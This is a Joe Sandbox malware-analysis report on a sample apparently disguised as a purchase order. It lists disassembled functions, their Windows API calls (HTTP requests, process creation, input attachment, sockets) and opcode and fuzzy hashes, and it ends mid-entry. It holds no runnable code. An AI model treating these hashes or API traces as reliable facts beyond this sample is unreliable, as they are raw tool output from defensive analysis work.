                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                        • String ID: 0
                        • API String ID: 176399719-4108050209
                        • Opcode ID: 8fe37f26c27f989fa3619c3cbc209c9a047675d3216b9445d7842d971b5bbdac
                        • Instruction ID: 53714ff63f7ab6a2d666e8717694fa1d21c77b0e0c310599c73a5710cdecbedb
                        • Opcode Fuzzy Hash: 8fe37f26c27f989fa3619c3cbc209c9a047675d3216b9445d7842d971b5bbdac
                        • Instruction Fuzzy Hash: 50418B75A00209EFEB26EF68E894BDA7BB9FF49304F150059E94597361D730A950CF60
                        Function 002FEC11 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                        Download Yara Rule
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 002FEC1E
                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 002FEC94
                        • GetLastError.KERNEL32 ref: 002FEC9E
                        • SetErrorMode.KERNEL32(00000000,READY), ref: 002FED0B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Error$Mode$DiskFreeLastSpace
                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                        • API String ID: 4194297153-14809454
                        • Opcode ID: 232c8e467fed5da4e93abe6719a66772317ddf56b32ede39e0abccc404af89a2
                        • Instruction ID: 63585e4899666dc94f4070722b51a7d3cb3ad693b2cfb7ad976742485ec313e5
                        • Opcode Fuzzy Hash: 232c8e467fed5da4e93abe6719a66772317ddf56b32ede39e0abccc404af89a2
                        • Instruction Fuzzy Hash: 0231B235A1020A9FCB12EF64D945AFEF7B8EF44780F118036F606DB2A1DB719951CB91
                        Function 002EC6FD Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002BCAEE: _memmove.LIBCMT ref: 002BCB2F
                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 002EC782
                        • GetDlgCtrlID.USER32 ref: 002EC78D
                        • GetParent.USER32 ref: 002EC7A9
                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 002EC7AC
                        • GetDlgCtrlID.USER32(?), ref: 002EC7B5
                        • GetParent.USER32(?), ref: 002EC7D1
                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 002EC7D4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend$CtrlParent$_memmove
                        • String ID: ComboBox$ListBox
                        • API String ID: 313823418-1403004172
                        • Opcode ID: 0a0d2907fdd5b46cb60782b52908c44845d8497ade2f8638bfd535192f273fa6
                        • Instruction ID: 28d046e6a1aee9d9fdcc65c8c97ff67a9e442cb360fd1fff956bce8140be6ab8
                        • Opcode Fuzzy Hash: 0a0d2907fdd5b46cb60782b52908c44845d8497ade2f8638bfd535192f273fa6
                        • Instruction Fuzzy Hash: BB21E070950208AFCF05ABA0CC82EFEBB69EB46300F604115F562972D1DBB45826AF20
                        Function 002EC7E6 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002BCAEE: _memmove.LIBCMT ref: 002BCB2F
                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 002EC869
                        • GetDlgCtrlID.USER32 ref: 002EC874
                        • GetParent.USER32 ref: 002EC890
                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 002EC893
                        • GetDlgCtrlID.USER32(?), ref: 002EC89C
                        • GetParent.USER32(?), ref: 002EC8B8
                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 002EC8BB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend$CtrlParent$_memmove
                        • String ID: ComboBox$ListBox
                        • API String ID: 313823418-1403004172
                        • Opcode ID: 332816dc10b43ffe4caf732d229bb11b1ef2cfd32731d9e4f11a83c374ec9cfa
                        • Instruction ID: 2abe9c4582647dc0f49c6994c65ad7b5a0b815195be36dcfacda9883c276658d
                        • Opcode Fuzzy Hash: 332816dc10b43ffe4caf732d229bb11b1ef2cfd32731d9e4f11a83c374ec9cfa
                        • Instruction Fuzzy Hash: FE21A171950208ABDF06EFA5CC96EFEBB69EF45300F604015F551A7191DBB45826AB20
                        Function 002EC8CD Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetParent.USER32 ref: 002EC8D9
                        • GetClassNameW.USER32(00000000,?,00000100), ref: 002EC8EE
                        • _wcscmp.LIBCMT ref: 002EC900
                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 002EC97B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ClassMessageNameParentSend_wcscmp
                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                        • API String ID: 1704125052-3381328864
                        • Opcode ID: 368bc81be16c16884885004eeed9d6880c2c6e0d9119043c45070587437752d9
                        • Instruction ID: 973d7a4707ede77f5f6c33747664689f42879e2465d90876526c14e7895bd967
                        • Opcode Fuzzy Hash: 368bc81be16c16884885004eeed9d6880c2c6e0d9119043c45070587437752d9
                        • Instruction Fuzzy Hash: 8911E3762A8743BAFA052A71AC0BCB6679CDB06364B700023F910A60D7FBA169334954
                        Function 0030B74B Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                        Download Yara Rule
                        APIs
                        • VariantInit.OLEAUT32(?), ref: 0030B777
                        • CoInitialize.OLE32(00000000), ref: 0030B7A4
                        • CoUninitialize.OLE32 ref: 0030B7AE
                        • GetRunningObjectTable.OLE32(00000000,?), ref: 0030B8AE
                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 0030B9DB
                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0030BA0F
                        • CoGetObject.OLE32(?,00000000,0033D91C,?), ref: 0030BA32
                        • SetErrorMode.KERNEL32(00000000), ref: 0030BA45
                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0030BAC5
                        • VariantClear.OLEAUT32(0033D91C), ref: 0030BAD5
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                        • String ID:
                        • API String ID: 2395222682-0
                        • Opcode ID: a1fd967d2f7cbe0c926d3b09caa33cb5b1df7b6fb35011facf71e760d725d9dd
                        • Instruction ID: f4ad07ec1664fc5d3383cedc7f068c668dbaf98074dac835361b1ec829b2293b
                        • Opcode Fuzzy Hash: a1fd967d2f7cbe0c926d3b09caa33cb5b1df7b6fb35011facf71e760d725d9dd
                        • Instruction Fuzzy Hash: 41C11271608345AFC701DF68C894A6AB7E9FF88344F10491DF98A9B2A1DB71ED05CB92
                        Function 002FB05A Relevance: 15.3, APIs: 10, Instructions: 317COMMON
                        Download Yara Rule
                        APIs
                        • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 002FB137
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ArraySafeVartype
                        • String ID:
                        • API String ID: 1725837607-0
                        • Opcode ID: 0ad6f5323a945903a18979b9727aadeb86c951ba8d7d5c21e164f2cfbeef1505
                        • Instruction ID: 579887f3b574eb283bdf5b1fb24b962bb1fe38f1ac19c08bd536f16aafb44223
                        • Opcode Fuzzy Hash: 0ad6f5323a945903a18979b9727aadeb86c951ba8d7d5c21e164f2cfbeef1505
                        • Instruction Fuzzy Hash: 60C18975A2021ADFDB02CF98D481BBEB7B4EF08355F20407AE605E7291C774AA95CF90
                        Function 002F4A5B Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentThreadId.KERNEL32 ref: 002F4A7D
                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,002F3AD7,?,00000001), ref: 002F4A91
                        • GetWindowThreadProcessId.USER32(00000000), ref: 002F4A98
                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002F3AD7,?,00000001), ref: 002F4AA7
                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 002F4AB9
                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,002F3AD7,?,00000001), ref: 002F4AD2
                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002F3AD7,?,00000001), ref: 002F4AE4
                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,002F3AD7,?,00000001), ref: 002F4B29
                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,002F3AD7,?,00000001), ref: 002F4B3E
                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,002F3AD7,?,00000001), ref: 002F4B49
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                        • String ID:
                        • API String ID: 2156557900-0
                        • Opcode ID: 222778c4a4eea6ac1425677aadae529a41dfdb04411fe73420945da1f9babe3b
                        • Instruction ID: 76a5153b52725db96f16821b81600b286634917c5a78372f818a5159f893ad60
                        • Opcode Fuzzy Hash: 222778c4a4eea6ac1425677aadae529a41dfdb04411fe73420945da1f9babe3b
                        • Instruction Fuzzy Hash: 54319572A20209AFDB22AF54EC85B7AB7BDAB50395F544025FA04D7160D7F4DDC08B50
                        Function 0032EC19 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetClientRect.USER32(?), ref: 0032EC32
                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 0032EC49
                        • GetWindowDC.USER32(?), ref: 0032EC55
                        • GetPixel.GDI32(00000000,?,?), ref: 0032EC64
                        • ReleaseDC.USER32(?,00000000), ref: 0032EC76
                        • GetSysColor.USER32(00000005), ref: 0032EC94
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ClientColorMessagePixelRectReleaseSendWindow
                        • String ID:
                        • API String ID: 272304278-0
                        • Opcode ID: 05b8b70072708d479ec3bc1ba6997dddbcb34f99574155e2b656a416e6f38a89
                        • Instruction ID: a3d0806d426c19c4994a373c4a3f9ada9a9d97c27f3f872e1822a89db57a9867
                        • Opcode Fuzzy Hash: 05b8b70072708d479ec3bc1ba6997dddbcb34f99574155e2b656a416e6f38a89
                        • Instruction Fuzzy Hash: 23213D31500215EFEB62AFB4FC8AFA97B79EB05321F504225FA26A50E1DB710951DF11
                        Function 002ED978 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON
                        Download Yara Rule
                        APIs
                        • EnumChildWindows.USER32(?,002EDD46), ref: 002EDC86
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ChildEnumWindows
                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                        • API String ID: 3555792229-1603158881
                        • Opcode ID: 1f9e67409acf80471612a2fe9e6002cc95c7e0ded49a76796efcbf49c7fcdb67
                        • Instruction ID: 22bd562bf7d42f0b3ac82488ca0b83077823e717e495b6477d282fcd169b6f22
                        • Opcode Fuzzy Hash: 1f9e67409acf80471612a2fe9e6002cc95c7e0ded49a76796efcbf49c7fcdb67
                        • Instruction Fuzzy Hash: EA91F730A60546EACB08DF61C481BEDFB75FF15344F94812AE84AA7291DF70697ACF90
                        Function 002B45A7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 211COMMON
                        Download Yara Rule
                        APIs
                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 002B45F0
                        • CoUninitialize.OLE32(?,00000000), ref: 002B4695
                        • UnregisterHotKey.USER32(?), ref: 002B47BD
                        • DestroyWindow.USER32(?), ref: 00325936
                        • FreeLibrary.KERNEL32(?), ref: 0032599D
                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 003259CA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                        • String ID: close all
                        • API String ID: 469580280-3243417748
                        • Opcode ID: 669ef724a11625ef22dc52a1a643de4fb44be9bb690a0a83a90b98bd10e03885
                        • Instruction ID: 3958b71d5fc55179ca22133afcd8bdab754688dbf350940b48e6d798e4910abf
                        • Opcode Fuzzy Hash: 669ef724a11625ef22dc52a1a643de4fb44be9bb690a0a83a90b98bd10e03885
                        • Instruction Fuzzy Hash: AF911D34620612CFC716EF14D8D5BA9F3A8FF15740F5542A9E40AA7262DB30AE6ACF10
                        Function 002CC24A Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                        Download Yara Rule
                        APIs
                        • SetWindowLongW.USER32(?,000000EB), ref: 002CC2D2
                          • Part of subcall function 002CC697: GetClientRect.USER32(?,?), ref: 002CC6C0
                          • Part of subcall function 002CC697: GetWindowRect.USER32(?,?), ref: 002CC701
                          • Part of subcall function 002CC697: ScreenToClient.USER32(?,?), ref: 002CC729
                        • GetDC.USER32 ref: 0032E006
                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0032E019
                        • SelectObject.GDI32(00000000,00000000), ref: 0032E027
                        • SelectObject.GDI32(00000000,00000000), ref: 0032E03C
                        • ReleaseDC.USER32(?,00000000), ref: 0032E044
                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0032E0CF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                        • String ID: U
                        • API String ID: 4009187628-3372436214
                        • Opcode ID: a2020a25498a758f5cd9ad8c8a9d71f469cd6bfc8af944c9e58db58e495337d0
                        • Instruction ID: 31dd1cf187e76ffb578eb2835353255f5449d8dad2d497d7f341f49dc4606e0e
                        • Opcode Fuzzy Hash: a2020a25498a758f5cd9ad8c8a9d71f469cd6bfc8af944c9e58db58e495337d0
                        • Instruction Fuzzy Hash: 7471E431500205EFCF22CF64EC81AEA7BB5FF49350F258269ED5A5A1A6C7318C51DB61
                        Function 00304C23 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                        Download Yara Rule
                        APIs
                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00304C5E
                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00304C8A
                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00304CCC
                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00304CE1
                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00304CEE
                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00304D1E
                        • InternetCloseHandle.WININET(00000000), ref: 00304D65
                          • Part of subcall function 003056A9: GetLastError.KERNEL32(?,?,00304A2B,00000000,00000000,00000001), ref: 003056BE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                        • String ID:
                        • API String ID: 1241431887-3916222277
                        • Opcode ID: 8b980cfe5effb1cf15ae8951309106fa42254640a6b5f3aade1981734523fe9b
                        • Instruction ID: eeb37e9e14804966f78eedb988284c178ac328f85714f8baceb89446b103336c
                        • Opcode Fuzzy Hash: 8b980cfe5effb1cf15ae8951309106fa42254640a6b5f3aade1981734523fe9b
                        • Instruction Fuzzy Hash: 3F416CB1502618BFEB139F60DC99FBB77ACEF48354F10411AFA019A191D7709E448BA0
                        Function 0030BAE6 Relevance: 13.9, APIs: 9, Instructions: 419COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0034DBF0), ref: 0030BBA1
                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0034DBF0), ref: 0030BBD5
                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0030BD33
                        • SysFreeString.OLEAUT32(?), ref: 0030BD5D
                        • StringFromGUID2.OLE32(?,?,00000028,?,0034DBF0), ref: 0030BEAD
                        • ProgIDFromCLSID.OLE32(?,?,?,0034DBF0), ref: 0030BEF7
                        • CoTaskMemFree.OLE32(?,?,?,0034DBF0), ref: 0030BF14
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                        • String ID:
                        • API String ID: 793797124-0
                        • Opcode ID: cfc7e73f15273172a177cfd1e18c579912140237fb4c1d92f3b05e7d898e4002
                        • Instruction ID: bc5119ec4b8b2f57e21a6bc49d912ab92642dc2374b5ad80f652b139b351dad1
                        • Opcode Fuzzy Hash: cfc7e73f15273172a177cfd1e18c579912140237fb4c1d92f3b05e7d898e4002
                        • Instruction Fuzzy Hash: 5BF10775A01209EFDB05DFA4C894EAEB7B9FF89314F118459F905AB290DB31AE41CF90
                        Function 003123C5 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 003123E6
                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00312579
                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0031259D
                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003125DD
                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003125FF
                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00312760
                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00312792
                        • CloseHandle.KERNEL32(?), ref: 003127C1
                        • CloseHandle.KERNEL32(?), ref: 00312838
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                        • String ID:
                        • API String ID: 4090791747-0
                        • Opcode ID: 4f67df7d129834fdd773e7b3fe7513b945ca752315dee20a96c9f65d86db5560
                        • Instruction ID: 4f11a57375111f7e13ffdf96e12c73120e71a8063f3cd0c95be286cdc09c15cf
                        • Opcode Fuzzy Hash: 4f67df7d129834fdd773e7b3fe7513b945ca752315dee20a96c9f65d86db5560
                        • Instruction Fuzzy Hash: EFD1B231614301DFC719EF24C891BAABBE5AF89350F15845DF8999B2A2DB30DCA1CF52
                        Function 00309AC3 Relevance: 13.7, APIs: 9, Instructions: 220networkCOMMON
                        Download Yara Rule
                        APIs
                        • select.WSOCK32 ref: 00309B38
                        • WSAGetLastError.WSOCK32(00000000), ref: 00309B45
